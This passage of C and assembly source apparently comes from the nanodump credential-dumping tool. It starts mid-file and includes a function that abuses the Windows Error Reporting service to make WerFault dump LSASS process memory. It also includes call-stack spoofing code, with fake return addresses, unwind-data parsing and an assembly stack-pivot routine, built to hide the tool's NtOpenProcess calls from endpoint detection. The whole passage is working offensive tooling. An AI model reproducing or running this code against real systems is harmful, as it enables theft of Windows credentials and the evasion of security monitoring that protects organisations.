        PRINT_ERR("Failed to open handle to spoofed process id %ld", process_id);
        goto cleanup;
    }

    status = NtGetNextThread(
        hProcess,
        hThread,
        THREAD_QUERY_LIMITED_INFORMATION,
        0,
        0,
        &hThread);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtGetNextThread", status);
        goto cleanup;
    }

    *pthread_id = get_tid(hThread);
    if (!*pthread_id)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (hProcess)
        NtClose(hProcess);
    if (hThread)
        NtClose(hThread);

    return ret_val;
}

BOOL werfault_shtinkering(
    IN DWORD lsass_pid,
    IN HANDLE hProcess)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    DWORD lsass_tid = 0;
    HANDLE hThread = NULL;
    HANDLE hWerfault = NULL;
    HANDLE hRecoveryEvent = NULL;
    HANDLE hCompletionEvent = NULL;
    HANDLE hFileMapping = NULL;
    PVOID mappedView = NULL;
    LARGE_INTEGER max_size = { 0 };
    SIZE_T view_size = 0;
    OBJECT_ATTRIBUTES attr_inheritable = { 0 };
    CLIENT_ID cid = { 0 };
    HANDLE hRegistry = NULL;
    PReportExceptionWerAlpcMessage receivingMessage = NULL;

    // Create exception details
    EXCEPTION_RECORD exceptionRecord = { 0 };
    EXCEPTION_POINTERS exceptionPointers = { 0 };
    CONTEXT context = { 0 };
    exceptionRecord.ExceptionCode = STATUS_UNSUCCESSFUL;
    exceptionPointers.ExceptionRecord = &exceptionRecord;
    exceptionPointers.ContextRecord = &context;

    success = set_registry_key(&hRegistry);
    if (!success)
        goto cleanup;

    InitializeObjectAttributes(&attr_inheritable, NULL, OBJ_INHERIT, 0, NULL);

    // Create hRecoveryEVent & hCompletionEvent
    status = NtCreateEvent(
        &hRecoveryEvent,
        GENERIC_ALL,
        &attr_inheritable,
        FALSE,
        FALSE);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateEvent", status);
        goto cleanup;
    }

    status = NtCreateEvent(
        &hCompletionEvent,
        GENERIC_ALL,
        &attr_inheritable,
        FALSE,
        FALSE);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateEvent", status);
        goto cleanup;
    }

    // Create the file mapping
    max_size.QuadPart = sizeof(MappedViewStruct);
    status = NtCreateSection(
        &hFileMapping,
        SECTION_ALL_ACCESS,
        &attr_inheritable,
        &max_size,
        PAGE_READWRITE,
        SEC_COMMIT,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateSection", status);
        goto cleanup;
    }

    status = NtMapViewOfSection(
        hFileMapping,
        NtCurrentProcess(),
        &mappedView,
        0,
        0,
        NULL,
        &view_size,
        ViewShare,
        0,
        PAGE_READWRITE);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtMapViewOfSection", status);
        goto cleanup;
    }

    success = find_valid_thread_id(lsass_pid, &lsass_tid);
    if (!success)
        goto cleanup;

    DPRINT("thread id: %ld", lsass_tid);

    cid.UniqueProcess = (HANDLE)(ULONG_PTR)lsass_pid;
    cid.UniqueThread = (HANDLE)(ULONG_PTR)lsass_tid;
    status = NtOpenThread(
        &hThread,
        THREAD_QUERY_LIMITED_INFORMATION,
        &attr_inheritable,
        &cid);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenThread", status);
        goto cleanup;
    }

    // Prepare the MappedViewStruct
    MappedViewStruct mps = { 0 };
    mps.Size = sizeof(MappedViewStruct);
    mps.ExceptionPointers = &exceptionPointers;
    mps.hCompletionEvent = hCompletionEvent;
    mps.hRecoveryEvent = hRecoveryEvent;
    mps.NtErrorCode = (DWORD)E_FAIL;
    mps.NtStatusErrorCode = STATUS_UNSUCCESSFUL;
    mps.TickCount = get_tick_count();
    mps.TargetProcessPid = lsass_pid;
    mps.hTargetProcess = hProcess;
    mps.TargetThreadTid = lsass_tid;
    mps.hTargetThread = hThread;

    // Prepare the ALPC request
    ReportExceptionWerAlpcMessage sendingMessage = { 0 };
    sendingMessage.PortMessage.u1.s1.TotalLength = sizeof(ReportExceptionWerAlpcMessage);
    sendingMessage.PortMessage.u1.s1.DataLength = sizeof(ReportExceptionWerAlpcMessage) - sizeof(PORT_MESSAGE);
    sendingMessage.MessageType = RequestReportUnhandledException;
    sendingMessage.Flags = 0;
    sendingMessage.hFileMapping = hFileMapping;
    sendingMessage.hCompletionEvent = hCompletionEvent;
    sendingMessage.hRecoveryEvent = hRecoveryEvent;
    sendingMessage.hFileMapping2 = hFileMapping;
    sendingMessage.hTargetProcess = mps.hTargetProcess;
    sendingMessage.hTargetThread = mps.hTargetThread;
    sendingMessage.TargetProcessId = mps.TargetProcessPid;

    // Prepare the ALPC response
    receivingMessage = intAlloc(sizeof(ReportExceptionWerAlpcMessage));
    if (!receivingMessage)
    {
        malloc_failed();
        goto cleanup;
    }
    receivingMessage->PortMessage.u1.s1.TotalLength = sizeof(ReportExceptionWerAlpcMessage);
    receivingMessage->PortMessage.u1.s1.DataLength = sizeof(ReportExceptionWerAlpcMessage) - sizeof(PORT_MESSAGE);

    // Copy the struct into the mapped view
    memcpy(mappedView, &mps, sizeof(mps));

    // Send the request and get the response from the ALPC server
    success = send_message_to_wer_service(
        &sendingMessage,
        receivingMessage);

    // Did we fail to send the ALPC message?
    if (!success)
    {
        goto cleanup;
    }

    // Did the operation not succeed on WerSvc side?
    if (!NT_SUCCESS(receivingMessage->NtStatusErrorCode))
    {
        DPRINT_ERR("receivingMessage->NtStatusErrorCode is 0x%lx", receivingMessage->NtStatusErrorCode);
        goto cleanup;
    }

    // Check if message type indicates failure
    if (ReplyReportUnhandledExceptionFailure != receivingMessage->MessageType)
    {
        DPRINT_ERR("receivingMessage->MessageType is 0x%lx", receivingMessage->NtStatusErrorCode);
        goto cleanup;
    }

    hWerfault = (HANDLE)(ULONG_PTR)receivingMessage->Flags;
    if (!hWerfault)
    {
        goto cleanup;
    }

    // Wait for WeFault to exit
    while (TRUE)
    {
        status = NtWaitForSingleObject(hWerfault, TRUE, NULL);

        // Was there was either a timeout or a failure
        if (STATUS_TIMEOUT == status || !NT_SUCCESS(status))
            break;

        // If there wasn't a failure,
        // did we return because of an APC or because the wait was aborted?
        if (STATUS_USER_APC != status && STATUS_ALERTED != status)
        {
            status = STATUS_SUCCESS;
            break;
        }

    }

    success = print_shtinkering_crash_location();
    if (!success)
    {
        DPRINT_ERR("Failed to print the crash directory");
    }

    ret_val = TRUE;

cleanup:
    if (hThread)
        NtClose(hThread);
    if (mappedView)
    {
        status = NtUnmapViewOfSection(
            NtCurrentProcess(),
            mappedView);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtUnmapViewOfSection", status);
        }
    }
    if (hFileMapping)
        NtClose(hFileMapping);
    if (hCompletionEvent)
        NtClose(hCompletionEvent);
    if (hRecoveryEvent)
        NtClose(hRecoveryEvent);
    if (hRegistry)
    {
        cleanup_registry_key(hRegistry);
        NtClose(hRegistry);
        DPRINT("cleaned the registry key");
    }
    if (receivingMessage)
    {
        DATA_FREE(receivingMessage, sizeof(ReportExceptionWerAlpcMessage));
    }

    return ret_val;
}


================================================
FILE: Creds-BOF/nanodump/source/spoof_callstack-asm.asm
================================================
.code

get_rip PROC
    mov rax, [rsp]
    ret
get_rip ENDP

get_rsp PROC
    lea rax, [rsp+08h]
    ret
get_rsp ENDP

get_tib PROC
	mov rax, gs:[30h]
	ret
get_tib ENDP

jumper PROC
	pop r11
	xor rax, rax
	mov rdx, [rcx+008h]
	mov r8, [rcx+010h]
	mov r9, [rcx]
	bkp_stack_loop1:
	mov r10b, [r9+rax]
	mov [r8+rax], r10b
	inc rax
	cmp rax, rdx
	jne bkp_stack_loop1
	xor rax, rax
	mov r8, [rcx+018h]
	mov r9, [rcx+028h]
	mov rdx, [rcx+020h] 
	cpy_fake_stack_loop1:
	mov r10b, [r8+rax]
	mov [r9+rax], r10b
	inc rax
	cmp rax, rdx
	jne cpy_fake_stack_loop1
	mov rax, [rcx+040h]
	mov rax, [rax+008h]
	mov rdx, [rcx+008h]
	mov [rax+000h], rdx
	mov rdx, [rcx+010h]
	mov [rax+008h], rdx
	mov rdx, [rcx]
	mov [rax+010h], rdx
	mov [rax+018h], rbx
	mov [rax+020h], rbp
	mov [rax+028h], rsp
	mov [rax+030h], r11
	xor rax, rax
	mov eax, [rcx+05ch]
	mov r10, rcx
	cmp eax, 01h
	jl params_ready1
	mov rcx, [r10+060h]
	cmp eax, 02h
	jl params_ready1
	mov rdx, [r10+068h]
	cmp eax, 03h
	jl params_ready1
	mov r8, [r10+070h]
	cmp eax, 04h
	jl params_ready1
	mov r9, [r10+078h]
	sub eax, 04h
	mov rbp, [r10+030h]
	stack_params_loop1:
	cmp eax, 01h
	jl params_ready1
	mov rbx, [r10+078h+rax*08h]
	mov [rbp+020h+rax*08h], rbx
	dec rax
	jmp stack_params_loop1
	params_ready1:
	mov rsp, [r10+030h]
	mov rbp, [r10+038h]
	mov eax, [r10+050h]
	mov r11, [r10+048h]
	mov r10, rcx
	jmp r11
jumper ENDP

end


================================================
FILE: Creds-BOF/nanodump/source/spoof_callstack.c
================================================
#include "spoof_callstack.h"
#include "hw_breakpoint.h"

PVOID from_fake_to_real(PSTACK_INFO stack_info, PVOID pointer)
{
    if (!pointer)
        return pointer;

    PVOID target_stack_bottom = RVA(PVOID, stack_info->fake_stack_target_addr, stack_info->fake_stack_size);
    return (PVOID)(ULONG_PTR)((ULONG_PTR)target_stack_bottom - ((ULONG_PTR)stack_info->fake_stack_heap_addr + stack_info->fake_stack_size - (ULONG_PTR)pointer));
}

VOID set_frame_info(
    OUT PSTACK_FRAME frame,
    IN LPWSTR path,
    IN DWORD api_hash,
    IN LPCSTR api_name,
    IN PCHAR pattern,
    IN PBYTE byte_match,
    IN ULONG offset)
{
    ULONG32 pattern_size = 0;

    memset(frame, 0, sizeof(STACK_FRAME));
    wcsncpy(frame->targetDll, path, wcsnlen(path, MAX_PATH));
    if (wcsrchr(path, '\\'))
        wcsncpy(frame->target_dll_name, &wcsrchr(path, '\\')[1], wcsnlen(path, MAX_PATH));
    else
        wcsncpy(frame->target_dll_name, path, wcsnlen(path, MAX_PATH));
    for (int i = 0; i < MAX_PATH; ++i)
    {
        if (frame->target_dll_name[i] == '.')
        {
            frame->target_dll_name[i] = 0;
            break;
        }
    }
    frame->functionHash = api_hash;
    if (api_name)
        strncpy(frame->function_name, api_name, MAX_PATH);
    frame->offset = offset;
    frame->totalStackSize = 0;
    frame->setsFramePointer = FALSE;
    frame->returnAddress = 0;
    frame->pushRbp = FALSE;
    frame->countOfCodes = 0;
    frame->pushRbpIndex = 0;
    if (pattern && byte_match)
    {
        pattern_size = strnlen(pattern, sizeof(frame->pattern) - 1);
        memcpy(frame->pattern, pattern, pattern_size);
        memcpy(frame->byte_match, byte_match, pattern_size);
    }
    frame->is_valid = FALSE;
    frame->push_frame = FALSE;
    frame->is_exception = FALSE;
}

BOOL compare_bytes(
    IN PBYTE pData,
    IN PBYTE bMask,
    IN PCHAR szMask)
{
    for (; *szMask; ++szMask, ++pData, ++bMask)
    {
        if (*szMask == 'x' && *pData != *bMask)
            return FALSE;
    }

    return TRUE;
}

BOOL find_pattern(
    IN PVOID dwAddress,
    IN ULONG32 dwLen,
    IN PBYTE bMask,
    IN PCHAR szMask,
    OUT PVOID* pattern_addr)
{
    PVOID current_address = NULL;
    for (ULONG32 i = 0; i < dwLen; i++)
    {
        current_address = RVA(PVOID, dwAddress, i);
        if (compare_bytes(current_address, bMask, szMask))
        {
            *pattern_addr = current_address;
            return TRUE;
        }
    }

    return FALSE;
}

VOID set_ntopenprocess_callstack(
    IN PSTACK_FRAME callstack,
    OUT PDWORD number_of_frames)
{
    DWORD i = 0;
#ifdef _WIN64
    // kernelbase.dll!ProcessIdToSessionId+0x96 after calling NtOpenProcess
    set_frame_info(
        &callstack[i++],
        L"KernelBase.dll",
        0xF495D426,
        "ProcessIdToSessionId",
        "xxx",
        (PBYTE)"\x48\xff\x15",
        7);
    // kernel32.dll!BaseThreadInitThunk+0x14 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"Kernel32.dll",
        0xA63E8FBC,
        "BaseThreadInitThunk",
        "x??x?????x",
        (PBYTE)"\x48\x8b\xc2\xff\x15\x24\xcc\x06\x00\x8b",
        9);
    // ntdll.dll!RtlUserThreadStart+0x21 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"ntdll.dll",
        0x551C5A87,
        "RtlUserThreadStart",
        "x",
        (PBYTE)"\xff",
        6);
#else
    // kernelbase.dll!ProcessIdToSessionId+0x96 after calling NtOpenProcess
    set_frame_info(
        &callstack[i++],
        L"KernelBase.dll",
        0xF495D426,
        "ProcessIdToSessionId",
        "xx????x",
        (PBYTE)"\xff\x15\x8c\x38\x1e\x10\x85",
        6);
    // kernel32.dll!BaseThreadInitThunk+0x14 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"Kernel32.dll",
        0xA63E8FBC,
        "BaseThreadInitThunk",
        "xx????x",
        (PBYTE)"\xff\x15\x38\x20\x88\x6b\xff",
        8);
    // ntdll.dll!RtlUserThreadStart+0x21 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"ntdll.dll",
        0x551C5A87,
        "RtlUserThreadStart",
        "xx????x",
        (PBYTE)"\xff\x15\xe0\x91\x3a\x4b\xff",
        8);
#endif
    *number_of_frames = i;
}

VOID set_default_callstack(
    IN PSTACK_FRAME callstack,
    OUT PDWORD number_of_frames)
{
    DWORD i = 0;
#ifdef _WIN64
    // kernel32.dll!BaseThreadInitThunk+0x14 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"Kernel32.dll",
        0xA63E8FBC,
        "BaseThreadInitThunk",
        "x??x?????x",
        (PBYTE)"\x48\x8b\xc2\xff\x15\x24\xcc\x06\x00\x8b",
        9);
    // ntdll.dll!RtlUserThreadStart+0x21 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"ntdll.dll",
        0x551C5A87,
        "RtlUserThreadStart",
        "x",
        (PBYTE)"\xff",
        6);
#else
    // kernel32.dll!BaseThreadInitThunk+0x14 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"Kernel32.dll",
        0xA63E8FBC,
        "BaseThreadInitThunk",
        "xx????x",
        (PBYTE)"\xff\x15\x38\x20\x88\x6b\xff",
        8);
    // ntdll.dll!RtlUserThreadStart+0x21 after the call instruction
    set_frame_info(
        &callstack[i++],
        L"ntdll.dll",
        0x551C5A87,
        "RtlUserThreadStart",
        "xx????x",
        (PBYTE)"\xff\x15\xe0\x91\x3a\x4b\xff",
        8);
#endif
    *number_of_frames = i;
}

BOOL get_text_section(
    PVOID image_base,
    PVOID* ptext_section_addr,
    PDWORD ptext_section_size)
{
    BOOL ret_val = FALSE;
    PIMAGE_DOS_HEADER dos = NULL;
    PIMAGE_NT_HEADERS nt = NULL;
    PIMAGE_SECTION_HEADER section_hdr = NULL;

    dos = (PIMAGE_DOS_HEADER)image_base;
    nt = RVA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);
    section_hdr = RVA(PIMAGE_SECTION_HEADER, &nt->OptionalHeader, nt->FileHeader.SizeOfOptionalHeader);

    for (DWORD i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if (strcmp(".text", (char*)section_hdr[i].Name) == 0)
        {
            *ptext_section_addr = RVA(PVOID, image_base, section_hdr[i].VirtualAddress);
            *ptext_section_size = section_hdr[i].SizeOfRawData;
            ret_val = TRUE;
            break;
        }
    }

    return ret_val;
}

/*
 * Calculate the return address for fake frame
 * always ensuring that it ends up in a valid address
 */
BOOL calculate_return_address(
    IN OUT PSTACK_FRAME frame)
{
    BOOL success = FALSE;
    BOOL ret_val = FALSE;
    PVOID image_base = NULL;
    PVOID func_base = NULL;
    ULONG32 max_look_range = 0;
    PVOID text_section_addr = 0;
    DWORD text_section_size = 0;
    PVOID pattern_addr = NULL;

    // get library base address
    image_base = (PVOID)get_library_address(frame->targetDll, TRUE);
    if (!image_base)
    {
        DPRINT_ERR("failed to get image base of %ls", frame->targetDll);
        goto cleanup;
    }

    success = get_text_section(
        image_base,
        &text_section_addr,
        &text_section_size);
    if (!success)
    {
        DPRINT_ERR("could not find the .text section of %ls", frame->targetDll);
        goto cleanup;
    }

    // set the return address to the start of the .text section
    frame->returnAddress = text_section_addr;

    if (frame->function_name[0] || frame->functionHash)
    {
        // get the address of the API
        if (frame->function_name[0])
        {
            func_base = get_function_address(
                image_base,
                SW2_HashSyscall(frame->function_name),
                0);
        }
        else
        {
            func_base = get_function_address(
                image_base,
                frame->functionHash,
                0);
        }
        if (!func_base)
        {
            if (frame->function_name[0])
            {
                DPRINT_ERR("could not find function with name %s in %ls", frame->function_name, frame->targetDll);
            }
            else
            {
                DPRINT_ERR("could not find function with hash 0x%lx in %ls", frame->functionHash, frame->targetDll);
            }
            goto cleanup;
        }
        // set the return address as the start of the function
        frame->returnAddress = func_base;
        // save the function address for pretty printing the stack layout
        frame->function_addr = func_base;
    }

    if (frame->pattern[0])
    {
        // make sure the pattern is within limits of the .text section
        max_look_range = text_section_size - ((ULONG_PTR)frame->returnAddress - (ULONG_PTR)text_section_addr) - 1;

        success = find_pattern(
            frame->returnAddress,
            max_look_range,
            frame->byte_match,
            frame->pattern,
            &pattern_addr);
        if (!success)
        {
            if (frame->function_name[0])
            {
                DPRINT_ERR("failed to find pattern match for the function with name %s", frame->function_name);
            }
            else
            {
                DPRINT_ERR("failed to find pattern match for the function with hash 0x%lx", frame->functionHash);
            }
            goto cleanup;
        }
        // set the return address to the start of the pattern found
        frame->returnAddress = pattern_addr;
    }

    if (frame->offset)
    {
        // make sure the offset is within limits of the .text section
        max_look_range = text_section_size - ((ULONG_PTR)frame->returnAddress - (ULONG_PTR)text_section_addr) - 1;
        if (frame->offset > max_look_range)
        {
            if (frame->function_name[0])
            {
                DPRINT_ERR("the offset 0x%lx for the function with name %s is too large", frame->offset, frame->function_name);
            }
            else
            {
                DPRINT_ERR("the offset 0x%lx for the function with hash 0x%lx is too large", frame->offset, frame->functionHash);
            }
            goto cleanup;
        }
        // add an offset to the current return address
        frame->returnAddress = RVA(PVOID, frame->returnAddress, frame->offset);
    }

    // save the final offset for pretty printing the stack layout
    if (frame->function_addr)
        frame->final_offset = (ULONG_PTR)frame->returnAddress - (ULONG_PTR)frame->function_addr;
    else
        frame->final_offset = (ULONG_PTR)frame->returnAddress - (ULONG_PTR)image_base;

    ret_val = TRUE;

cleanup:
    return ret_val;
}

#ifdef _WIN64

/*
 * Calculates the total stack space used by the fake stack frame. Uses
 * a minimal implementation of RtlVirtualUnwind to parse the unwind codes
 * for target function and add up total stack size. Largely based on:
 * https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773
 */
BOOL calculate_function_stack_size_internal(
    IN OUT PSTACK_FRAME frame,
    IN ULONG32 frame_index,
    IN ULONG32 number_of_frames,
    PRUNTIME_FUNCTION pRuntimeFunction,
    PVOID image_base)
{
    BOOL ret_val = FALSE;
    PUNWIND_INFO pUnwindInfo = NULL;
    ULONG unwindOperation = 0;
    ULONG operationInfo = 0;
    ULONG index = 0;
    ULONG frameOffset = 0;
    ULONG PrologOffset = 0;
    BOOL success = TRUE;
    UCHAR m_RtlpUnwindOpSlotTable[12];

    UCHAR slottable[] = {
        1,          // UWOP_PUSH_NONVOL
        2,          // UWOP_ALLOC_LARGE (or 3, special cased in lookup code)
        1,          // UWOP_ALLOC_SMALL
        1,          // UWOP_SET_FPREG
        2,          // UWOP_SAVE_NONVOL
        3,          // UWOP_SAVE_NONVOL_FAR
        1,          // UWOP_EPILOG
        0,          // UWOP_SPARE_CODE
        2,          // UWOP_SAVE_XMM128
        3,          // UWOP_SAVE_XMM128_FAR
        1,          // UWOP_PUSH_MACHFRAME
        1           // UWOP_SET_FPREG_LARGE
    };
    memcpy(m_RtlpUnwindOpSlotTable, slottable, sizeof(slottable));

    do
    {
        unwindOperation = 0;
        operationInfo = 0;
        index = 0;
        frameOffset = 0 ;
        success = TRUE;
        pUnwindInfo = (PUNWIND_INFO)(ULONG_PTR)(pRuntimeFunction->UnwindData + (ULONG_PTR)image_base);
        PrologOffset = (ULONG)(ULONG_PTR)((ULONG_PTR)frame->returnAddress - ((ULONG_PTR)pRuntimeFunction->BeginAddress + (ULONG_PTR)image_base));

        /*
         * [1] Loop over unwind info.
         * NB As this is a PoC, it does not handle every unwind operation, but
         * rather the minimum set required to successfully mimic the default
         * call stacks included.
         */
        while (index < pUnwindInfo->CountOfCodes)
        {
            unwindOperation = pUnwindInfo->UnwindCode[index].UnwindOp;
            operationInfo = pUnwindInfo->UnwindCode[index].OpInfo;

            if (PrologOffset >= pUnwindInfo->UnwindCode[index].CodeOffset)
            {
                /*
                 * [2] Loop over unwind codes and calculate
                 * total stack space used by target function.
                 */
                if (unwindOperation == UWOP_PUSH_NONVOL)
                {
                    // UWOP_PUSH_NONVOL is 8 bytes.
                    frame->totalStackSize += 8;
                    // Record if it pushes rbp as
                    // this is important for UWOP_SET_FPREG.
                    if (RBP_OP_INFO == operationInfo)
                    {
                        frame->pushRbp = TRUE;
                        // Record when rbp is pushed to stack.
                        frame->countOfCodes = pUnwindInfo->CountOfCodes;
                        frame->pushRbpIndex = index + 1;
                    }
                }
                else if (unwindOperation == UWOP_SAVE_NONVOL)
                {
                    // UWOP_SAVE_NONVOL doesn't contribute to stack size
                    // but you do need to increment index.
                    index += 1;
                }
                else if (unwindOperation == UWOP_SAVE_NONVOL_FAR)
                {
                    // UWOP_SAVE_NONVOL_FAR doesn't contribute to stack size
                    // but you do need to increment index.
                    index += 2;
                }
                else if (unwindOperation == UWOP_ALLOC_SMALL)
                {
                    //Alloc size is op info field * 8 + 8.
                    frame->totalStackSize += ((operationInfo * 8) + 8);
                }
                else if (unwindOperation == UWOP_ALLOC_LARGE)
                {
                    // Alloc large is either:
                    // 1) If op info == 0 then size of alloc / 8
                    // is in the next slot (i.e. index += 1).
                    // 2) If op info == 1 then size is in next
                    // two slots.
                    index += 1;
                    frameOffset = pUnwindInfo->UnwindCode[index].FrameOffset;
                    if (operationInfo == 0)
                    {
                        frameOffset *= 8;
                    }
                    else
                    {
                        index += 1;
                        frameOffset += (pUnwindInfo->UnwindCode[index].FrameOffset << 16);
                    }
                    frame->totalStackSize += frameOffset;
                }
                else if (unwindOperation == UWOP_SET_FPREG)
                {
                    // This sets rsp == rbp (mov rsp,rbp), so we need to ensure
                    // that rbp is the expected value (in the frame above) when
                    // it comes to spoof this frame in order to ensure the
                    // call stack is correctly unwound.
                    frame->setsFramePointer = TRUE;

                    // if the frame sets the FramePointer but is the top frame,
                    // reduce the totalStackSize by 0x10 bytes (no idea why this works)
                    if (frame_index == 0)
                        frame->totalStackSize -= 0x10;
                }
                else if (unwindOperation == UWOP_EPILOG)
                {
                    // do nothing
                }
                else if (unwindOperation == UWOP_SAVE_XMM128)
                {
                    // do nothing
                    index += 1;
                }
                else if (unwindOperation == UWOP_SAVE_XMM128_FAR)
                {
                    // do nothing
                    index += 2;
                }
                else if (unwindOperation == UWOP_PUSH_MACHFRAME)
                {
                    frame->push_frame = TRUE;
                    frame->is_exception = operationInfo != 0;
                    break;
                }
                else
                {
                    PRINT_ERR("unsupported Unwind Op Code: 0x%lx", unwindOperation);
                    success = FALSE;
                }

                index += 1;
            }
            else
            {
                //
                // Skip this unwind operation by advancing the slot index by the
                // number of slots consumed by this operation.
                //

                index += m_RtlpUnwindOpSlotTable[unwindOperation];

                //
                // Special case any unwind operations that can consume a variable
                // number of slots.
                //

                if (unwindOperation == UWOP_ALLOC_LARGE)
                {
                    if (operationInfo != 0)
                    {
                        index += 1;
                    }

                }
            }
        }

        if (!success)
            goto cleanup;

        // If chained unwind information is present then we need to
        // also recursively parse this and add to total stack size.
        if (pUnwindInfo->Flags & UNW_FLAG_CHAININFO)
        {
            index = pUnwindInfo->CountOfCodes;
            if (0 != (index & 1))
            {
                index += 1;
            }
            pRuntimeFunction = (PRUNTIME_FUNCTION)(&pUnwindInfo->UnwindCode[index]);
        }
    } while(pUnwindInfo->Flags & UNW_FLAG_CHAININFO);

    // Add the size of the return address (8 bytes).
    frame->totalStackSize += 8;

    ret_val = TRUE;

cleanup:
    return ret_val;
}

#endif

/*
 * Retrieves the runtime function entry for given fake ret address
 * and calls CalculateFunctionStackSize, which will recursively
 * calculate the total stack space utilisation.
 */
BOOL calculate_function_stack_size(
    IN OUT PSTACK_FRAME frame,
    IN ULONG32 frame_index,
    IN ULONG32 number_of_frames)
{
#ifdef _WIN64

    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    PRUNTIME_FUNCTION pRuntimeFunction = NULL;
    PVOID ImageBase = NULL;

    success = lookup_function_entry(
        (ULONG_PTR)frame->returnAddress,
        &pRuntimeFunction,
        &ImageBase);
    if (!pRuntimeFunction)
        goto cleanup;

    /*
     * [2] Recursively calculate the total stack size for
     * the function we are "returning" to
     */
    success = calculate_function_stack_size_internal(
        frame,
        frame_index,
        number_of_frames,
        pRuntimeFunction,
        ImageBase);
    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    return ret_val;

#else

    // set the totalStackSize to a value large enough to store many parameters
    frame->totalStackSize = 0x70;
    return TRUE;

#endif
}

/*
 * Takes a target call stack and configures it ready for use
 * via loading any required dlls, resolving module addresses
 * and calculating spoofed return addresses.
 */
VOID initialize_spoofed_callstack(
    PSTACK_FRAME callstack,
    DWORD number_of_frames)
{
    BOOL success = FALSE;
    PSTACK_FRAME frame = NULL;

    for (DWORD i = 0; i < number_of_frames; i++)
    {
        frame = &callstack[i];
        frame->is_valid = FALSE;

        // [1] Calculate ret address for current stack frame.
        success = calculate_return_address(frame);
        if (!success)
            continue;

        // [2] Calculate the total stack size for ret function.
        success = calculate_function_stack_size(frame, i, number_of_frames);
        if (!success)
            continue;

        frame->is_valid = TRUE;
    }
}

// Pushes a value to the stack of a Context structure.
//
VOID push_to_stack(
    PSTACK_INFO stack_info,
    ULONG_PTR value)
{
#ifdef _WIN64
    stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - 0x8);
    *(PULONG64)(stack_info->fake_stack_rsp) = value;
#else
    stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - 0x4);
    *(PULONG32)(stack_info->fake_stack_rsp) = value;
#endif
}

#ifdef _WIN64

VOID initialize_fake_thread_state(
    PSTACK_FRAME callstack,
    DWORD number_of_frames,
    PSTACK_INFO stack_info)
{
    ULONG_PTR childSp = 0;
    BOOL bPreviousFrameSetUWOP_SET_FPREG = FALSE;
    PSTACK_FRAME stackFrame = NULL;
    stack_info->fake_stack_rbp = NULL;

    // As an extra sanity check explicitly clear
    // the last RET address to stop any further unwinding.
    push_to_stack(stack_info, 0);

    // [2] Loop through target call stack *backwards*
    // and modify the stack so it resembles the fake
    // call stack e.g. essentially making the top of
    // the fake stack look like the diagram below:
    //      |                |
    //       ----------------
    //      |  RET ADDRESS   |
    //       ----------------
    //      |                |
    //      |     Unwind     |
    //      |     Stack      |
    //      |      Size      |
    //      |                |
    //       ----------------
    //      |  RET ADDRESS   |
    //       ----------------
    //      |                |
    //      |     Unwind     |
    //      |     Stack      |
    //      |      Size      |
    //      |                |
    //       ----------------
    //      |   RET ADDRESS  |
    //       ----------------   <--- RSP when NtOpenProcess is called
    //
    for (DWORD i = 0; i < number_of_frames; i++)
    {
        // loop from the last to the first
        stackFrame = &callstack[number_of_frames - i - 1];

        // if the frame is not valid, simply ignore it
        if (!stackFrame->is_valid)
            continue;

        if (stackFrame->push_frame)
        {
            PVOID prev_ret_addr = *((PVOID*)stack_info->fake_stack_rsp);
            PVOID prev_rsp = RVA(PVOID, stack_info->fake_stack_rsp, 0x8);

            stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - stackFrame->totalStackSize);

            // push a machine frame: https://learn.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-170

            ULONG32 base = stackFrame->totalStackSize - 0x8;

            // if there is an excepcion, the error code is pushed last
            if (stackFrame->is_exception)
                base += 0x8;

            // SS
            *(PVOID*)((ULONG_PTR)stack_info->fake_stack_rsp + base + 0x28) = 0x0;
            // Old RSP
            *(PVOID*)((ULONG_PTR)stack_info->fake_stack_rsp + base + 0x20) = from_fake_to_real(stack_info, prev_rsp);
            // EFLAGS
            *(PVOID*)((ULONG_PTR)stack_info->fake_stack_rsp + base + 0x18) = 0x0;
            // CS
            *(PVOID*)((ULONG_PTR)stack_info->fake_stack_rsp + base + 0x10) = 0x0;
            // RIP
            *(PVOID*)((ULONG_PTR)stack_info->fake_stack_rsp + base + 0x08) = prev_ret_addr;
            // Error code
            if (stackFrame->is_exception)
                *(PVOID*)((ULONG_PTR)stack_info->fake_stack_rsp + base + 0x00) = 0x0;

            // write the ret address
            *(PVOID*)((ULONG_PTR)stack_info->fake_stack_rsp) = stackFrame->returnAddress;
            // update RBP
            stack_info->fake_stack_rbp = RVA(PVOID, stack_info->fake_stack_rsp, - 0x8);
        }
        // [2.1] Check if the last frame set UWOP_SET_FPREG.
        // If the previous frame uses the UWOP_SET_FPREG
        // op, it will reset the stack pointer to rbp.
        // Therefore, we need to find the next function in
        // the chain which pushes rbp and make sure it writes
        // the correct value to the stack so it is propagated
        // to the frame after that needs it (otherwise stackwalk
        // will fail). The required value is the childSP
        // of the function that used UWOP_SET_FPREG (i.e. the
        // value of RSP after it is done adjusting the stack and
        // before it pushes its RET address).
        else if (bPreviousFrameSetUWOP_SET_FPREG && stackFrame->pushRbp)
        {
            // [2.2] Check when RBP was pushed to the stack in function
            // prologue. UWOP_PUSH_NONVOls will always be last:
